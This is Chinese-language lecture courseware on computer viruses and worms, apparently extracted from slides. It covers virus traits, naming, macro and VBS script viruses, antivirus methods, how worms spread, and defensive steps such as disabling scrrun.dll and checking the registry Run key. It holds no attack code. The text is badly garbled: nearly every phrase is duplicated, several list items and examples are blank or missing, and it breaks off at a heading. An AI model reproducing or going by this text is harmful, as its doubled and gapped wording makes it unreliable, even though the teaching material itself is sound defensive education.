计算机病毒技术课件

1、计算机病毒技术计算机病毒技术 l主要内容主要内容 l介绍计算机病毒的历史、病毒的基本特征、病介绍计算机病毒的历史、病毒的基本特征、病 毒的命名、病毒的预防及清除等毒的命名、病毒的预防及清除等 l介绍蠕虫分类、技术特点、基本结构、传播过介绍蠕虫分类、技术特点、基本结构、传播过 程、对蠕虫的防范和清除方法等程、对蠕虫的防范和清除方法等 恶意程序的种类恶意程序的种类 1 1、陷门（或称后门）、陷门（或称后门） 2 2、逻辑炸弹、逻辑炸弹 3 3、特洛伊木马、特洛伊木马 4 4、病毒、病毒 5 5、蠕虫、蠕虫 6 6、细菌、细菌 7 7、流氓软件、流氓软件 计算机病毒的历史计算机病毒的历史 l1983

2、1983年首次确认计算机病毒，年首次确认计算机病毒，19881988年美国研究生年美国研究生莫里莫里 斯斯编写的蠕虫病毒首次造成重大经济损失，引起了人编写的蠕虫病毒首次造成重大经济损失，引起了人 们的广泛重视。我国从上世纪八十年代开始发现计算们的广泛重视。我国从上世纪八十年代开始发现计算 机病毒，如机病毒，如 黑色星期五黑色星期五 ， 米氏病毒米氏病毒 ， 小球病毒小球病毒 等。等。 l计算机病毒经历了从计算机病毒经历了从dosdos病毒到病毒到windowswindows病毒，再到网病毒，再到网 络蠕虫的发展过程，计算机病毒的种类层出不穷。络蠕虫的发展过程，计算机病毒的种类层出不穷。 l伴随

3、着计算机病毒的发展，杀毒软件和防病毒软件也伴随着计算机病毒的发展，杀毒软件和防病毒软件也 得到了迅速的发展得到了迅速的发展 计算机病毒的定义计算机病毒的定义 l计算机病毒：计算机病毒： l是指编制或者在计算机程序中插入破坏计算机功能是指编制或者在计算机程序中插入破坏计算机功能 或者毁坏数据，影响计算机使用，并能自我复制的或者毁坏数据，影响计算机使用，并能自我复制的 一组计算机指令或者程序代码。一组计算机指令或者程序代码。 计算机病毒产生的原因计算机病毒产生的原因 1 1、恶作剧或表现自己、恶作剧或表现自己 2 2、经济利益、经济利益 3 3、个别人的报复心理、个别人的报复心理 4 4、版权保护

4、、版权保护 5 5、政治目的、政治目的 计算机病毒的特征计算机病毒的特征 l传染性传染性 l判别一个程序是否为计算机病毒的最重要条件判别一个程序是否为计算机病毒的最重要条件 l隐蔽性隐蔽性 l病毒一般只有几百或病毒一般只有几百或1 1k k字节，附在正常程序内或磁盘上，很字节，附在正常程序内或磁盘上，很 难区别病毒程序与正常程序。难区别病毒程序与正常程序。 l潜伏性潜伏性 l只有在满足其特定条件时才启动其表现（破坏）模块只有在满足其特定条件时才启动其表现（破坏）模块 l表现性表现性 l任何病毒只要侵入系统，都会对系统及应用程序产生程度不任何病毒只要侵入系统，都会对系统及应用程序产生程度不 同的

5、影响。同的影响。 病毒的传染性病毒的传染性 l计算机病毒的传染性是指病毒具有把自身复制到其它计算机病毒的传染性是指病毒具有把自身复制到其它 媒体的特性。这些媒体可以是程序、文件或存储介质。媒体的特性。这些媒体可以是程序、文件或存储介质。 l病毒传染的种类病毒传染的种类 l文件传染：文件传染： l包括传染可执行文件、文档文件、数据文件和包括传染可执行文件、文档文件、数据文件和webweb文件等文件等 l引导扇区传染引导扇区传染 l引导扇区是系统第一次读该磁盘或引导系统时要读取的地方，引导扇区是系统第一次读该磁盘或引导系统时要读取的地方， 因此只要访问磁盘就可能传染引导扇区病毒因此只要访问磁盘就可

6、能传染引导扇区病毒 l网络传染网络传染 l通过网络直接进入目标主机，而不需要通过染毒文件作为载通过网络直接进入目标主机，而不需要通过染毒文件作为载 体，典型代表是蠕虫病毒体，典型代表是蠕虫病毒 文件感染性病毒和引导区病毒都需要具有自我检测的文件感染性病毒和引导区病毒都需要具有自我检测的 功能，以避免二次感染造成自身的崩溃。功能，以避免二次感染造成自身的崩溃。 病毒的隐蔽性病毒的隐蔽性 l病毒程序一般都很小，只有几百或病毒程序一般都很小，只有几百或1 1k k字节，通常会把字节，通常会把 自己嵌入到染毒文件中，并且不会改变染毒文件的属自己嵌入到染毒文件中，并且不会改变染毒文件的属 性性( (如最

7、后修改时间、只读属性等如最后修改时间、只读属性等) )。 l病毒程序在保证自己运行的前提下，通常会使系统和病毒程序在保证自己运行的前提下，通常会使系统和 染毒文件也能正常运行。染毒文件也能正常运行。 l病毒编写者在编制病毒程序时通常会加入很多非正常病毒编写者在编制病毒程序时通常会加入很多非正常 的跳转指令或采用加密技术以避免病毒程序被破解。的跳转指令或采用加密技术以避免病毒程序被破解。 病毒的潜伏性病毒的潜伏性 l病毒的潜伏性是指病毒具有依附其它媒体而寄病毒的潜伏性是指病毒具有依附其它媒体而寄 生的能力。生的能力。 l计算机病毒只有当满足某种触发条件时才会发计算机病毒只有当满足某种触发条件时才

8、会发 作，这些触发条件包括三种：作，这些触发条件包括三种： l利用时间触发：包括系统时间和病毒内自带的计数利用时间触发：包括系统时间和病毒内自带的计数 器器 l利用计算机内执行的特定操作触发利用计算机内执行的特定操作触发 l外部命令触发外部命令触发 病毒的表现性病毒的表现性 l病毒的表现性是指当病毒被触发时，病毒在染毒计算病毒的表现性是指当病毒被触发时，病毒在染毒计算 机上发作所表现出的症状和破坏性。机上发作所表现出的症状和破坏性。 l病毒的表现性包括：病毒的表现性包括： 1 1、有益的服务、有益的服务2 2、占用、占用CPUCPU资源资源 3 3、干扰系统运行、干扰系统运行4 4、干扰键盘、

9、喇叭或屏幕、干扰键盘、喇叭或屏幕 5 5、干扰打印机、干扰打印机6 6、攻击、攻击CMOSCMOS，攻击硬件攻击硬件 7 7、攻击系统数据区、攻击系统数据区8 8、攻击文件、攻击文件 9 9、攻击内存、攻击内存1010、窃取机密信息、窃取机密信息 1111、窃取核心控制权、窃取核心控制权1212、破坏网络系统、破坏网络系统 病毒的分类病毒的分类 l引导型病毒引导型病毒 l文件型病毒文件型病毒 l宏病毒宏病毒 l蠕虫病毒蠕虫病毒 l木马病毒木马病毒 l脚本病毒脚本病毒 l多态性病毒多态性病毒 计算机病毒的表现现象计算机病毒的表现现象 l经常死机经常死机 l运行速度变慢运行速度变慢 l打印和通信异

10、常打印和通信异常 l系统文件属性发生变化系统文件属性发生变化 l磁盘空间减少磁盘空间减少 l自动链接某些网站自动链接某些网站 l系统无法启动系统无法启动 l文档丢失或破坏文档丢失或破坏 l网络瘫痪网络瘫痪 计算机病毒的一般组成计算机病毒的一般组成 l安装模块安装模块 l传染模块传染模块 l破坏模块破坏模块 计算机病毒制作技术计算机病毒制作技术 l采用自加密技术采用自加密技术 l采用变形技术采用变形技术 l采用特殊的隐形技术采用特殊的隐形技术 l对抗计算机病毒防范系统对抗计算机病毒防范系统 l反跟踪技术反跟踪技术 l利用中断处理机制利用中断处理机制 宏病毒宏病毒 l宏病毒是使用宏语言编写的程序，

11、可以在一些数据处宏病毒是使用宏语言编写的程序，可以在一些数据处 理系统中运行，存在于字处理文档、数据表格、数据理系统中运行，存在于字处理文档、数据表格、数据 库、演示文档等数据文件中，利用宏语言的功能将自库、演示文档等数据文件中，利用宏语言的功能将自 己复制并且繁殖到其它数据文档中己复制并且繁殖到其它数据文档中 宏的概念宏的概念 l宏是指一段类似于批处理命令的多行代码的集合。宏是指一段类似于批处理命令的多行代码的集合。 l宏设计的目的是为了简化我们的工作，它可以记录命宏设计的目的是为了简化我们的工作，它可以记录命 令和记录，然后自动运行，而宏病毒则是利用了宏自令和记录，然后自动运行，而宏病毒则

12、是利用了宏自 动运行的特点动运行的特点 宏的种类与编写宏的种类与编写 l在在word等办公软件中有许多等办公软件中有许多“内建宏内建宏”，当用户进，当用户进 行打开文件、新建文件、保存文件、打印文件和关闭行打开文件、新建文件、保存文件、打印文件和关闭 文件等操作时，会调用这些宏，例如打开文件之前调文件等操作时，会调用这些宏，例如打开文件之前调 用用、打印文件之前调用等，还有一些会自动调用的全打印文件之前调用等，还有一些会自动调用的全 局宏，如局宏，如AutoOpen、AutoClose、AutoNew等等 l编写宏的操作如下编写宏的操作如下 l按按Alt_F11打开宏编辑窗口，右键单击打开宏编

13、辑窗口，右键单击“Normal”，选择选择 “插入插入- -模块模块”，然后输入代码并保存，然后输入代码并保存 宏病毒如何传播宏病毒如何传播 l宏包括两种：宏包括两种： l每个文档中间包含的宏，如每个文档中间包含的宏，如 l为所有打开的文档共用的宏，如为所有打开的文档共用的宏，如AutoOpen l宏病毒一般首先隐藏在一个指定的宏病毒一般首先隐藏在一个指定的Word文件中，一旦运行该文件，文件中，一旦运行该文件， 宏病毒即被运行。宏病毒首先将自身拷贝到全局宏的区域，使得宏病毒即被运行。宏病毒首先将自身拷贝到全局宏的区域，使得 所有打开的文件都会使用该宏。所有打开的文件都会使用该宏。 l当当Wo

14、rd退出时，全局宏将被存放在某个全局的模板文件中退出时，全局宏将被存放在某个全局的模板文件中。当当 Word再次运行时会自动装入病毒并执行。再次运行时会自动装入病毒并执行。 如何发现宏病毒如何发现宏病毒 l选择菜单：选择菜单：“工具工具”-“宏宏”-“宏宏” 或直接按或直接按 Alt+F11，如果发现有很多以如果发现有很多以“Auto”开始的宏，那开始的宏，那 么很可能被宏病毒感染了么很可能被宏病毒感染了 如何清除宏病毒如何清除宏病毒 l将感染宏病毒的将感染宏病毒的word文件另存为文件另存为RTF格式，然后退格式，然后退 出文档编辑器，再删除已感染的文档文件、出文档编辑器，再删除已感染的文档

15、文件、 normal.dot和安装目录下的和安装目录下的startup子目录下的文件子目录下的文件 lWord文件转换为文件转换为RTF格式会导致正常使用的宏丢失，格式会导致正常使用的宏丢失， 因此需要事先保存这些宏，再清除病毒后再恢复这些因此需要事先保存这些宏，再清除病毒后再恢复这些 正常的宏正常的宏 脚本病毒脚本病毒 l脚本病毒是使用脚本语言编写的计算机病毒，其编写脚本病毒是使用脚本语言编写的计算机病毒，其编写 方法比用其它语言简单，且具有传播快、破坏力大的方法比用其它语言简单，且具有传播快、破坏力大的 特点特点 l典型案例典型案例 l“爱虫爱虫”病毒、病毒、“新欢乐时光新欢乐时光”病毒病

16、毒 WSH简介简介 lWSH概念概念 l是是Windows Scripting Host的缩写，即的缩写，即Windows 脚本宿主脚本宿主 lWSH最早出现于最早出现于Windows98系统，可以解释执行脚系统，可以解释执行脚 本语言本语言 lWSH默认脚本宿主可以设为默认脚本宿主可以设为wscript.exe或或 cscript.exe VBS脚本病毒的特点脚本病毒的特点 l编写简单编写简单 l破坏力大破坏力大 l传染力强传染力强 l传播范围大传播范围大 l病毒源码容易被获取，变种多病毒源码容易被获取，变种多 l欺骗性强欺骗性强 l使得病毒生产机实现起来非常容易使得病毒生产机实现起来非常容

17、易 VBS脚本病毒的弱点脚本病毒的弱点 l绝大部分绝大部分VBS脚本病毒运行时需要用到一个对象：脚本病毒运行时需要用到一个对象： lVBS代码是通过代码是通过WSH来解释执行的来解释执行的 lVBS脚本病毒的运行需要关联程序脚本病毒的运行需要关联程序Wscript.exe的支持的支持 l通过网页传播的病毒需要通过网页传播的病毒需要ActiveX的支持的支持 l通过通过E_mail传播的病毒需要传播的病毒需要OutlookExpress的自动发送邮件功的自动发送邮件功 能支持，而绝大部分能支持，而绝大部分VBS脚本病毒都是以脚本病毒都是以E_mail做为主要传播方做为主要传播方 式的式的 VBS

18、脚本病毒的预防和解除脚本病毒的预防和解除 l禁用文件系统对象禁用文件系统对象 l用用regsvr32 scrrun.dll /u命令可以禁止文件系统对象，或直命令可以禁止文件系统对象，或直 接查找接查找scrrun.dll文件删除或改名文件删除或改名 l卸载卸载Windows Scripting Host l进入进入“控制面板控制面板”中的中的“添加添加/ /删除程序删除程序”卸载该组件卸载该组件 l删除删除VBS、VBE、JS、JSE 文件后缀名与应用程序文件后缀名与应用程序 的关联的关联 l进入进入“我的电脑我的电脑”-“察看察看”-“文件夹选项文件夹选项”-“文件类文件类 型型”，然后删

19、除这些文件后缀名与应用程序的关联，然后删除这些文件后缀名与应用程序的关联 l在在Windows目录中，找到目录中，找到Wscript.exe并删除或改名并删除或改名 VBS脚本病毒的预防和解除脚本病毒的预防和解除 l自定义安全级别，将自定义安全级别，将“Internet选项选项”中设置禁用中设置禁用 ActiveX控件及插件控件及插件 l禁止禁止OutlookExpress的自动收发邮件功能的自动收发邮件功能 l设置显示文件扩展名设置显示文件扩展名 l将系统的网络连接的安全级别设置至少为将系统的网络连接的安全级别设置至少为“中等中等” l杀毒软件杀毒软件 计算机杀毒软件制作技术计算机杀毒软件制

20、作技术 l特征代码法特征代码法 l校验和法校验和法 l行为监测法行为监测法 l虚拟机技术虚拟机技术 l主动内核技术主动内核技术 l启发扫描的反病毒技术启发扫描的反病毒技术 l实时反病毒技术实时反病毒技术 l邮件病毒防杀技术邮件病毒防杀技术 病毒的命名规则病毒的命名规则 l一般格式为：一般格式为： l. l病毒前缀是指一个病毒的种类，他是用来区别病毒前缀是指一个病毒的种类，他是用来区别 病毒的种族分类的。病毒的种族分类的。 l病毒后缀是指一个病毒的变种特征，是用来区病毒后缀是指一个病毒的变种特征，是用来区 别具体某个家族病毒的某个变种的。一般都采别具体某个家族病毒的某个变种的。一般都采 用英文中

21、的用英文中的26个字母来表示。个字母来表示。 病毒的命名一病毒的命名一 l系统病毒系统病毒 l系统病毒的前缀是系统病毒的前缀是Win32Win32、PEPE、Win95Win95、W32W32、W95W95等。这些病等。这些病 毒的一般公有的特性是可以感染毒的一般公有的特性是可以感染windowswindows操作系统的操作系统的 * *. .exe exe 和和 * *. .dll dll 文件，并通过这些文件进行传播。如文件，并通过这些文件进行传播。如CIHCIH病毒。病毒。 l蠕虫病毒蠕虫病毒 l蠕虫病毒的前缀是蠕虫病毒的前缀是WormWorm。这种病毒的公有特性是通过网络或这种病毒的公

22、有特性是通过网络或 者系统漏洞进行传播，很大部分的蠕虫病毒都有向外发送带者系统漏洞进行传播，很大部分的蠕虫病毒都有向外发送带 毒邮件，阻塞网络的特性。比如冲击波（阻塞网络），小邮毒邮件，阻塞网络的特性。比如冲击波（阻塞网络），小邮 差（发带毒邮件）等。差（发带毒邮件）等。 病毒的命名二病毒的命名二 l木马病毒、黑客病毒木马病毒、黑客病毒 l木马病毒的前缀是木马病毒的前缀是TrojanTrojan，黑客病毒前缀是黑客病毒前缀是 HackHack。木马病木马病 毒通常是通过网络或者系统漏洞进入用户的系统并隐藏，然毒通常是通过网络或者系统漏洞进入用户的系统并隐藏，然 后向外界泄露用户的信息，而黑客病

23、毒则有一个可视的界面，后向外界泄露用户的信息，而黑客病毒则有一个可视的界面， 能对用户的电脑进行远程控制。木马、黑客病毒往往是成对能对用户的电脑进行远程控制。木马、黑客病毒往往是成对 出现的。出现的。 l脚本病毒脚本病毒 l病毒的前缀是病毒的前缀是ScriptScript。脚本病毒的公有特性是使用脚本语言脚本病毒的公有特性是使用脚本语言 编写，通过网页进行的传播的病毒。脚本病毒还会有如下前编写，通过网页进行的传播的病毒。脚本病毒还会有如下前 缀：缀：VBSVBS、JSJS（表明是何种脚本编写的）。如欢乐时光表明是何种脚本编写的）。如欢乐时光 （VBS.HappytimeVBS.Happytim

24、e）、）、十四日（十四日（Js.Fortnight.c.sJs.Fortnight.c.s）等。等。 l宏病毒宏病毒 l宏病毒的前缀是宏病毒的前缀是MacroMacro，第二前缀是：第二前缀是：WordWord、Word97Word97、ExcelExcel、 Excel97Excel97等其中之一。如：著名的美丽莎等其中之一。如：著名的美丽莎( (Macro.Melissa)Macro.Melissa)。 病毒的命名三病毒的命名三 l后门病毒后门病毒 l后门病毒的前缀是后门病毒的前缀是BackdoorBackdoor。该类病毒的公有特性是通过网该类病毒的公有特性是通过网 络传播，给系统开后门

25、，给用户电脑带来安全隐患。如后门络传播，给系统开后门，给用户电脑带来安全隐患。如后门 Backdoor.IRCBot Backdoor.IRCBot 。 l病毒种植程序病毒病毒种植程序病毒 l病毒的前缀是病毒的前缀是DrooperDrooper，这类病毒公有特性是运行时会从体这类病毒公有特性是运行时会从体 内释放出一个或几个新的病毒到系统目录下，由释放出来的内释放出一个或几个新的病毒到系统目录下，由释放出来的 新病毒产生破坏。如：冰河播种者（新病毒产生破坏。如：冰河播种者（Dropper.BingHe2.2CDropper.BingHe2.2C）、）、 MSNMSN射手射手( (Dropper

26、.Worm.Smibag)Dropper.Worm.Smibag)等。等。 l破坏性程序病毒破坏性程序病毒 l破坏性程序病毒的前缀是破坏性程序病毒的前缀是HarmHarm。这类病毒的公有特性是本身这类病毒的公有特性是本身 具有好看的图标来诱惑用户点击，当用户点击这类病毒时，具有好看的图标来诱惑用户点击，当用户点击这类病毒时， 病毒便会直接对用户计算机产生破坏。如：格式化病毒便会直接对用户计算机产生破坏。如：格式化C C盘盘 （Harm.formatC.fHarm.formatC.f）、）、杀手命令（杀手命令（Harm.Command.KillerHarm.Command.Killer） 等。等

27、。 病毒的命名四病毒的命名四 l玩笑病毒玩笑病毒 l玩笑病毒的前缀是玩笑病毒的前缀是JokeJoke，也称恶作剧病毒。这类病毒的公有也称恶作剧病毒。这类病毒的公有 特性是本身具有好看的图标来诱惑用户点击，当用户点击这特性是本身具有好看的图标来诱惑用户点击，当用户点击这 类病毒时，病毒会做出各种破坏操作来吓唬用户，其实病毒类病毒时，病毒会做出各种破坏操作来吓唬用户，其实病毒 并没有对用户电脑进行任何破坏。如：女鬼并没有对用户电脑进行任何破坏。如：女鬼 （Joke.GirlghostJoke.Girlghost）病毒。病毒。 l捆绑机病毒捆绑机病毒 l捆绑机病毒的前缀是：捆绑机病毒的前缀是：Bin

28、derBinder。这类病毒的公有特性是病毒这类病毒的公有特性是病毒 作者会使用特定的捆绑程序将病毒与一些应用程序如作者会使用特定的捆绑程序将病毒与一些应用程序如QQQQ、IEIE 捆绑起来，表面上看是一个正常的文件，当用户运行这些捆捆绑起来，表面上看是一个正常的文件，当用户运行这些捆 绑病毒时，会表面上运行这些应用程序，然后隐藏运行捆绑绑病毒时，会表面上运行这些应用程序，然后隐藏运行捆绑 在一起的病毒，从而给用户造成危害。如：捆绑在一起的病毒，从而给用户造成危害。如：捆绑QQQQ （Binder.QQPass.QQBinBinder.QQPass.QQBin）、）、系统杀手（系统杀手（Bin

29、der.killsysBinder.killsys） 等。等。 计算机病毒的预防计算机病毒的预防 1 1、安装防病毒产品并及时更新最新的病毒特征库、安装防病毒产品并及时更新最新的病毒特征库 2 2、安装防火墙、安装防火墙 3 3、补齐系统漏洞及应用程序漏洞、补齐系统漏洞及应用程序漏洞 4 4、不打开来历不明的邮件中的附件、不打开来历不明的邮件中的附件 5 5、对外来的软盘、光盘和其它存储介质，及对电子邮、对外来的软盘、光盘和其它存储介质，及对电子邮 件和互联网文件进行病毒检查。件和互联网文件进行病毒检查。 6 6、尽量不从不可靠的渠道下载软件、尽量不从不可靠的渠道下载软件 7 7、不访问恶意网

30、页、不访问恶意网页 8 8、善于从异常情况中发现病毒并予以清除、善于从异常情况中发现病毒并予以清除 计算机病毒的清除计算机病毒的清除 l由于病毒通常会把自身嵌入或替换染毒文件，因此我由于病毒通常会把自身嵌入或替换染毒文件，因此我 们一方面要养成定期数据备份的好习惯，另外在杀病们一方面要养成定期数据备份的好习惯，另外在杀病 毒前也要将染毒文件做好毒前也要将染毒文件做好备份备份，以免在杀病毒的同时，以免在杀病毒的同时 破坏了原有文件，给自己造成损失。破坏了原有文件，给自己造成损失。 l使用杀毒软件进行杀毒，杀毒软件必须先查杀内存中使用杀毒软件进行杀毒，杀毒软件必须先查杀内存中 的病毒，再杀磁盘中的

31、病毒，否则需要用干净的引导的病毒，再杀磁盘中的病毒，否则需要用干净的引导 盘启动后再用杀毒软件杀毒。盘启动后再用杀毒软件杀毒。 l杀毒软件的病毒特征库必须是最新的，并且最好能用杀毒软件的病毒特征库必须是最新的，并且最好能用 两种以上的杀毒软件进行杀毒，降低某种杀毒软件可两种以上的杀毒软件进行杀毒，降低某种杀毒软件可 能存在的缺陷而漏过某些病毒。能存在的缺陷而漏过某些病毒。 蠕虫病毒蠕虫病毒 l蠕虫病毒是指通过复制自身，并将副本通过网络传到蠕虫病毒是指通过复制自身，并将副本通过网络传到 其他计算机上的程序。其他计算机上的程序。 l蠕虫病毒具有病毒的一些共性，如传染性、隐蔽性、蠕虫病毒具有病毒的一

32、些共性，如传染性、隐蔽性、 潜伏性、破坏性等。潜伏性、破坏性等。 l在产生的破坏性上，蠕虫病毒也不是普通病毒所能比在产生的破坏性上，蠕虫病毒也不是普通病毒所能比 拟的，网络的发展使得蠕虫可以在短时间内蔓延整个拟的，网络的发展使得蠕虫可以在短时间内蔓延整个 网络，造成网络瘫痪。网络，造成网络瘫痪。 蠕虫所造成的破坏蠕虫所造成的破坏 病毒名称病毒名称 持续时间持续时间 造成损失造成损失 莫里斯蠕虫莫里斯蠕虫 19881988年年 60006000多台计算机停机，直接经济损失达多台计算机停机，直接经济损失达 96009600万美元万美元! ! 美丽杀手美丽杀手 19991999年年 政府部门和一些大

33、公司紧急关闭了网络政府部门和一些大公司紧急关闭了网络 服务器，经济损失超过服务器，经济损失超过1212亿美元亿美元! ! 爱虫病毒爱虫病毒 20002000年年5 5月至今月至今 众多用户电脑被感染，损失超过众多用户电脑被感染，损失超过100100亿亿 美元以上美元以上 红色代码红色代码 20012001年年7 7月月 网络瘫痪，直接经济损失超过网络瘫痪，直接经济损失超过2626亿美元亿美元 求职信求职信 20012001年年1212月至今月至今 大量病毒邮件堵塞服务器，损失达数百大量病毒邮件堵塞服务器，损失达数百 亿美元亿美元 Sql蠕虫王蠕虫王 20032003年年1 1月月 网络大面积瘫

34、痪，银行自动提款机运做网络大面积瘫痪，银行自动提款机运做 中断，直接经济损失超过中断，直接经济损失超过2626亿美元亿美元 蠕虫与一般病毒的异同蠕虫与一般病毒的异同 l一般的病毒是需要寄生的，它可以通过自己指令的执一般的病毒是需要寄生的，它可以通过自己指令的执 行，将自己的指令代码写到其他程序的体内，而被感行，将自己的指令代码写到其他程序的体内，而被感 染的文件就被称为染的文件就被称为”宿主宿主”。 l蠕虫一般不采取插入文件的方法，而是复制自身在互蠕虫一般不采取插入文件的方法，而是复制自身在互 联网环境下进行传播。一般病毒的传染能力主要是针联网环境下进行传播。一般病毒的传染能力主要是针 对计算

35、机内的文件系统而言，而蠕虫的传染目标是互对计算机内的文件系统而言，而蠕虫的传染目标是互 联网内的所有计算机。联网内的所有计算机。 l局域网条件下的共享文件夹，电子邮件局域网条件下的共享文件夹，电子邮件emailemail，网络网络 中的恶意网页，大量存在着漏洞的服务器等都成为蠕中的恶意网页，大量存在着漏洞的服务器等都成为蠕 虫传播的良好途径。虫传播的良好途径。 蠕虫的技术特点蠕虫的技术特点 l利用操作系统和应用程序的漏洞主动进行攻击利用操作系统和应用程序的漏洞主动进行攻击 l此类病毒主要有此类病毒主要有“红色代码红色代码”、“尼姆达尼姆达”、”求求 职信职信”等。等。 l“尼姆达尼姆达”病毒和

36、病毒和“红色代码红色代码”病毒是利用了微软病毒是利用了微软 IISIIS服务器软件的漏洞，服务器软件的漏洞，“SqlSql蠕虫王蠕虫王”病毒则是利病毒则是利 用了用了SQL Server2000SQL Server2000的一个漏洞。的一个漏洞。 l传播方式多样传播方式多样 l如如“尼姆达尼姆达”病毒和病毒和”求职信求职信”病毒，可利用的传病毒，可利用的传 播途径包括文件、邮件附件、播途径包括文件、邮件附件、WebWeb服务器、网络共服务器、网络共 享等。享等。 蠕虫的技术特点蠕虫的技术特点 l病毒制作技术与传统的病毒不同病毒制作技术与传统的病毒不同 l蠕虫病毒可以采用脚本语言编写，制作相对简

37、单。蠕虫病毒可以采用脚本语言编写，制作相对简单。 l与黑客技术相结合与黑客技术相结合! ! 潜在的威胁和损失更大。潜在的威胁和损失更大。 l以红色代码为例，感染后的机器的以红色代码为例，感染后的机器的webweb目录的目录的 scriptsscripts下将生成一个下将生成一个root.exeroot.exe，可以远程执行任可以远程执行任 何命令，从而使黑客能够再次进入何命令，从而使黑客能够再次进入! ! 蠕虫的基本结构蠕虫的基本结构 l蠕虫的基本程序结构为：蠕虫的基本程序结构为： l传播模块传播模块 l负责蠕虫的传播。负责蠕虫的传播。 l隐藏模块隐藏模块 l侵入主机后，隐藏蠕虫程序，防止被用

38、户发现。侵入主机后，隐藏蠕虫程序，防止被用户发现。 l目的功能模块目的功能模块 l实现对计算机的控制、监视或破坏等功能。实现对计算机的控制、监视或破坏等功能。 l蠕虫的传播技术是蠕虫技术的首要技术，传播模块实蠕虫的传播技术是蠕虫技术的首要技术，传播模块实 现的实际上是自动入侵的功能。没有蠕虫的传播技术，现的实际上是自动入侵的功能。没有蠕虫的传播技术， 也就谈不上什么蠕虫技术了也就谈不上什么蠕虫技术了 蠕虫的传播过程蠕虫的传播过程 l传播模块分为：传播模块分为： l扫描模块、攻击模块和复制模块。扫描模块、攻击模块和复制模块。 l蠕虫程序的一般传播过程为：蠕虫程序的一般传播过程为： 1.1.扫描扫

39、描：由蠕虫的扫描功能模块负责探测存在漏洞的：由蠕虫的扫描功能模块负责探测存在漏洞的 主机。当程序向某个主机发送探测漏洞的信息并收到主机。当程序向某个主机发送探测漏洞的信息并收到 成功的反馈信息后，就得到一个可传播的对象。成功的反馈信息后，就得到一个可传播的对象。 2.2.攻击攻击：攻击模块按漏洞攻击步骤自动攻击步骤：攻击模块按漏洞攻击步骤自动攻击步骤1 1中中 找到的对象，取得该主机的权限（一般为管理员权找到的对象，取得该主机的权限（一般为管理员权 限），获得一个限），获得一个shellshell。 3.3.复制复制：复制模块通过原主机和新主机的交互将蠕虫：复制模块通过原主机和新主机的交互将蠕

40、虫 程序复制到新主机并启动。程序复制到新主机并启动。 蠕虫所造成的威胁蠕虫所造成的威胁 l蠕虫所造成的主要威胁包括：蠕虫所造成的主要威胁包括： l占用了大量网络带宽，造成网络拥塞，网络性能急剧下降。占用了大量网络带宽，造成网络拥塞，网络性能急剧下降。 l消耗系统资源，导致系统的性能下降。消耗系统资源，导致系统的性能下降。 l有些蠕虫还会在染毒机器上留有后门，威胁计算机的安全。有些蠕虫还会在染毒机器上留有后门，威胁计算机的安全。 l蠕虫的扫描策略蠕虫的扫描策略 l随机选取某一段随机选取某一段IPIP地址，然后对这一地址段上的主机扫描。地址，然后对这一地址段上的主机扫描。 有些扫描程序会不断重复上

41、面这一过程。这样，随着蠕虫有些扫描程序会不断重复上面这一过程。这样，随着蠕虫 的传播，新感染的主机也开始进行这种扫描，这些扫描程的传播，新感染的主机也开始进行这种扫描，这些扫描程 序不知道那些地址已经被扫描过，它只是简单的随机扫描序不知道那些地址已经被扫描过，它只是简单的随机扫描 互联网。于是蠕虫传播的越广，网络上的扫描包就越多。互联网。于是蠕虫传播的越广，网络上的扫描包就越多。 l蠕虫传播的其它方式蠕虫传播的其它方式 l例如利用邮件地址薄获得邮件地址，群发带有蠕虫程序的例如利用邮件地址薄获得邮件地址，群发带有蠕虫程序的 邮件，用户收到邮件后邮件被动打开，蠕虫程序启动邮件，用户收到邮件后邮件被

42、动打开，蠕虫程序启动 企业用户对蠕虫病毒的防范措施企业用户对蠕虫病毒的防范措施 l加强网络管理员安全管理水平，提高安全意识加强网络管理员安全管理水平，提高安全意识 l建立病毒检测系统建立病毒检测系统 l建立应急响应系统建立应急响应系统 l建立灾难备份系统建立灾难备份系统 l对于局域网而言，可以采用以下一些主要手段：对于局域网而言，可以采用以下一些主要手段： l在因特网接入口处安装防杀计算机病毒产品，将病毒隔离在在因特网接入口处安装防杀计算机病毒产品，将病毒隔离在 局域网之外。局域网之外。 l对邮件服务器进行监控，防止带毒邮件进行传播。对邮件服务器进行监控，防止带毒邮件进行传播。 l对局域网用户

43、进行安全培训。对局域网用户进行安全培训。 个人用户对蠕虫病毒的防范措施个人用户对蠕虫病毒的防范措施 l安装合适的杀毒软件安装合适的杀毒软件 l经常升级病毒库经常升级病毒库 l提高防杀毒意识，不要轻易去点击陌生的站点提高防杀毒意识，不要轻易去点击陌生的站点 l不随意查看陌生邮件，尤其是带有附件的邮件不随意查看陌生邮件，尤其是带有附件的邮件 如何预防和清除蠕虫如何预防和清除蠕虫 l补齐系统和应用软件的补丁程序补齐系统和应用软件的补丁程序 l安装防病毒软件安装防病毒软件 l利用蠕虫专杀工具利用蠕虫专杀工具 l手工清除蠕虫手工清除蠕虫 l注意注意: : l根据蠕虫利用网络传播的特点，因此在杀蠕虫时需要

44、切断染根据蠕虫利用网络传播的特点，因此在杀蠕虫时需要切断染 毒机器与网络的连接，否则在杀蠕虫的同时又会不断地重新毒机器与网络的连接，否则在杀蠕虫的同时又会不断地重新 感染。感染。 如何手工清除蠕虫如何手工清除蠕虫 l在蠕虫专杀工具尚未公布之前，需要通过手工清除蠕在蠕虫专杀工具尚未公布之前，需要通过手工清除蠕 虫，手工清除掌握四要素：漏洞、内存、注册表、文虫，手工清除掌握四要素：漏洞、内存、注册表、文 件。件。 l清除步骤如下：清除步骤如下： 1 1、给系统漏洞打补丁、给系统漏洞打补丁 2 2、清除内存中的病毒进程、清除内存中的病毒进程 3 3、删除注册表中的病毒项、删除注册表中的病毒项 为了每

45、次开机自动启动，蠕虫会修改注册表中的启动项，为了每次开机自动启动，蠕虫会修改注册表中的启动项， 具体位置是具体位置是 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrenHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurren tVersionRuntVersionRun 4 4、删除病毒文件。、删除病毒文件。 如果该文件不能删除，则进入安全模式或者用如果该文件不能删除，则进入安全模式或者用A A盘直接启盘直接启 动到动到DOSDOS模式下进行删除。模式下进行删除。 云安全技术云安全技术 l“云安全云安全”技术

